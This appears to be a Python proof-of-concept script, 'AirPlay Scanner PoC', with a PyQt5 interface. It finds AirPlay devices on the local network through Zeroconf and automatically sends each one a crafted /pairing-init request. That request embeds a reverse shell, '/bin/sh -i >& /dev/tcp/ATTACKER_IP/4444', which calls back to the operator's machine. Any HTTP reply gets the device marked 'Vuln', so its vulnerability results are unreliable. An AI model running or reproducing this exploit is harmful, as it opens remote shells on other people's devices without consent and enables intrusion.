import sys import socket import threading import time from PyQt5 import QtWidgets, QtCore, QtGui from zeroconf import Zeroconf, ServiceBrowser, ServiceListener # === CONFIG === ATTACKER_IP = (lambda: (lambda s: (s.connect(("8.8.8.8", 80)), s.getsockname()[0])[1])(socket.socket(socket.AF_INET, socket.SOCK_DGRAM)))() ATTACKER_PORT = 4444 TARGET_PORT = 7000 DEBUG = True def debug(msg): if DEBUG: print(f"[DEBUG] {msg}") # --- Zeroconf listener --- class AirPlayListener(ServiceListener): def __init__(self, scanner): self.scanner = scanner def add_service(self, zc, svc_type, name): info = zc.get_service_info(svc_type, name) if not info or not info.addresses: return ip = socket.inet_ntoa(info.addresses[0]) if ip.startswith("127.") or ip in self.scanner.seen: return self.scanner.seen.add(ip) inst = name.split('.')[0] props = {} for k, v in info.properties.items(): try: key = k.decode() if isinstance(k, bytes) else str(k) val = v.decode() if isinstance(v, bytes) else str(v) props[key] = val except: continue dev = {"name": inst, "ip": ip, "rce": False} dev.update(props) debug(f"Discovered {inst}@{ip} with props {list(props.keys())}") self.scanner.deviceFound.emit(dev.copy()) threading.Thread(target=self.scanner.test_device, args=(dev,), daemon=True).start() update_service = add_service def remove_service(self, *args, **kwargs): pass # --- Scanner thread --- class ScannerThread(QtCore.QThread): deviceFound = QtCore.pyqtSignal(dict) deviceTested = QtCore.pyqtSignal(dict) def __init__(self): super().__init__() self.seen = set() self._stop = False def run(self): debug("ScannerThread starting") zc = Zeroconf() ServiceBrowser(zc, "_airplay._tcp.local.", AirPlayListener(self)) try: while not self._stop: time.sleep(0.1) finally: zc.close() debug("ScannerThread stopped") def stop(self): self._stop = True def test_device(self, dev): ip = dev["ip"] debug(f"RCE test on {ip}") xml = f""" launchctl /bin/sh -i >& /dev/tcp/{ATTACKER_IP}/{ATTACKER_PORT} 0>&1 """ req = ( f"POST /pairing-init HTTP/1.1\r\n" f"Host: {ip}\r\n" "Content-Type: application/x-apple-binary-plist\r\n" f"Content-Length: {len(xml)}\r\n" "Connection: close\r\n\r\n" + xml ).encode() try: s = socket.socket() s.settimeout(5) s.connect((ip, TARGET_PORT)) s.sendall(req) resp = s.recv(4096) debug(f"RCE resp: {resp[:64]!r}") if resp.startswith(b"HTTP"): dev["rce"] = True debug("-> Marked RCE Vulnerable") except Exception as e: debug(f"RCE error: {e}") finally: try: s.close() except: pass self.deviceTested.emit(dev.copy()) # --- GUI --- class MainWindow(QtWidgets.QMainWindow): def __init__(self): super().__init__() self.setWindowTitle("AirPlay Scanner PoC") self.resize(600, 400) self.device_info = {} self.tree = QtWidgets.QTreeWidget() self.tree.setColumnCount(2) self.tree.setHeaderLabels(["Device", "RCE"]) hdr = self.tree.header() hdr.setSectionResizeMode(QtWidgets.QHeaderView.ResizeToContents) self.tree.itemClicked.connect(self.expand_info) self.setCentralWidget(self.tree) self.scanner = ScannerThread() self.scanner.deviceFound.connect(self.add_item) self.scanner.deviceTested.connect(self.update_item) self.scanner.start() @QtCore.pyqtSlot(dict) def add_item(self, d): ip = d['ip'] self.device_info[ip] = d.copy() it = QtWidgets.QTreeWidgetItem([f"{d['name']} ({ip})", "Scanning..."]) it.setData(0, QtCore.Qt.UserRole, ip) it.setChildIndicatorPolicy(QtWidgets.QTreeWidgetItem.ShowIndicator) self.tree.addTopLevelItem(it) @QtCore.pyqtSlot(dict) def update_item(self, d): ip = d['ip'] self.device_info[ip] = d.copy() for i in range(self.tree.topLevelItemCount()): it = self.tree.topLevelItem(i) if it.data(0, QtCore.Qt.UserRole) == ip: it.setText(1, "Vuln" if d['rce'] else "Safe") color = "red" if d['rce'] else "green" it.setForeground(1, QtGui.QBrush(QtGui.QColor(color))) break def expand_info(self, item, col): ip = item.data(0, QtCore.Qt.UserRole) dev = self.device_info.get(ip) if not dev: return item.takeChildren() for key, val in dev.items(): child = QtWidgets.QTreeWidgetItem([f"{key}: {val}"]) item.addChild(child) item.setExpanded(True) # --- Entry point --- def main(): app = QtWidgets.QApplication(sys.argv) window = MainWindow() window.show() sys.exit(app.exec_()) if __name__ == '__main__': debug("Starting AirPlay Scanner PoC") main()